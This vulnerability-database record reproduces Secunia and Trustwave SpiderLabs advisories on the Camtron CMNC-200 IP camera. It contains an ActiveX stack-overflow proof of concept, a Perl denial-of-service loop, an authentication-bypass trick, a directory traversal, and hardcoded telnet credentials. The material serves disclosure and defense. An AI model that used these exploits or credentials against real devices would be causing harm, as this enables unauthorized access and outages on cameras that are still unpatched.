ID

VAR-201011-0101

CVE

CVE-2010-4231

TITLE

Camtron CMNC-200 Full HD IP Camera of Web Directory traversal vulnerability in base management interface

DESCRIPTION

Directory traversal vulnerability in the web-based administration interface on the Camtron CMNC-200 Full HD IP Camera and TecVoz CMNC-200 Megapixel IP Camera with firmware 1.102A-008 allows remote attackers to read arbitrary files via a .. (dot dot) in the URI. The Camtron CMNC-200 is a webcam. The Camtron CMNC-200 built-in WEB server has a directory traversal problem, and an attacker can read system files with ROOT privileges. Camtron CMNC-200 Full HD IP Camera is prone to multiple security vulnerabilities. Exploiting these issues will allow remote attackers to execute arbitrary code, trigger a denial of service, or completely compromise the device. TVSLiveControl 1.6.50.33 is vulnerable; others may also be affected. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta. Join the beta: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Camtron CMNC-200 Multiple Vulnerabilities SECUNIA ADVISORY ID: SA42229 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42229/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42229 RELEASE DATE: 2010-11-18 DISCUSS ADVISORY: http://secunia.com/advisories/42229/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/42229/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=42229 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Wendel G. Henrique has reported a security issue and some vulnerabilities in Camtron CMNC-200, which can be exploited by malicious people to bypass certain security restrictions, disclose potentially sensitive information, cause a DoS (Denial of Service), and compromise a vulnerable system. For more information: SA42311 The vulnerabilities are reported in version V1.102A-008 / Board ID 66. PROVIDED AND/OR DISCOVERED BY: Wendel G. Henrique, Trustwave's SpiderLabs ORIGINAL ADVISORY: https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . The most notable features are full HD support (1920 x 1080), dual streaming, 10x optical zoom, SD card input, input and output alarm sensor, and integration with different DVR solutions. Source: http://www.camtron.co.kr Credit: Wendel G. Henrique of Trustwave's SpiderLabs CVE: CVE-2010-4230 CVE-2010-4231 CVE-2010-4232 CVE-2010-4233 CVE-2010-4244 Finding 1: Buffer Overflow in ActiveX Control CVE: CVE-2010-4230 The CMNC-200 IP Camera ActiveX control identified by CLSID {DD01C8CA-5DA0-4B01-9603-B7194E561D32} is vulnerable to a stack overflow on the first argument of the connect method. The vulnerability can be used to set the EIP register, allowing a reliable exploitation. The example code below triggers the vulnerability. <html> <head><title>IPcam POC</title> <script> function Check(){ var bf1 = 'A'; while (bf1.length <= 6144) bf1 = bf1 + 'A'; obj.connect(bf1,"BBBB","CCCC"); } </script> </head> <body onload=" Check();"> <object classid="clsid:DD01C8CA-5DA0-4B01-9603-B7194E561D32" id="obj"> </object> </html></body> Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. Authentication is not required for exploitation. Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Finding 3: Web Based Administration Interface Bypass CVE: CVE-2010-4232 The CMNC-200 IP Camera has an administrative web interface that does not handle authentication properly. Using a properly formatted request, an attacker can bypass the authentication mechanism. The first example requires authentication: http://www.ipcamera.com/system.html When a second forward slash is placed after the hostname, authentication is not required. Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Finding 4: Undocumented Default Accounts CVE: CVE-2010-4233 The CMNC-200 IP Camera has undocumented default accounts on its Linux operating system. These accounts can be used to login via the cameras telnet interface, which cannot be normally disabled. The usernames and passwords are listed below. User: root Password: m User: mg3500 Password: merlin Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Finding 5: Camera Denial of Service CVE: CVE-2010-4234 The CMNC-200 IP Camera has a built-in web server that is vulnerable to denial of service attacks. Sending multiple requests in parallel to the web server may cause the camera to reboot. Requests with long cookie header makes the IP camera reboot a few seconds faster, however the same can be accomplished with requests of any size. The example code below is able to reboot the IP cameras in less than a minute in a local network. #!/usr/bin/perl use LWP::UserAgent; while (1 == 1){ $ua = new LWP::UserAgent; $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6)"); $req = HTTP::Request->new(GET => 'http://192.168.10.100'); $req->header(Accept => "text/xml,application/xml,application/xhtml+xml,text/html ;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"); $req->header("Keep-Alive" => 0); $req->header(Connection => "close"); $req->header("If-Modified-Since" => "Mon, 12 Oct 2009 02:06:34 GMT"); $req->header(Cookie => "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); my $res = $ua->request($req); } Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Vendor Communication Timeline: 10/7/10 - Vendor contact attempted 10/21/10 - Vendor contact attempted 11/1/10 - Vendor contact attempted 11/11/10 - CVE numbers obtained 11/12/10 - Advisory public release Revision History: 1.0 Initial publication About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs is the advance security team at Trustwave responsible for incident response and forensics, ethical hacking and application security tests for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

IOT TAXONOMY

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

THREAT TYPE

remote

TYPE

path traversal

CONFIGURATIONS

EXPLOIT AVAILABILITY

PATCH

EXTERNAL IDS

REFERENCES

CREDITS

Wendel G. Henrique of Trustwave's SpiderLabs

SOURCES

LAST UPDATE DATE

2024-08-14T14:05:37.123000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE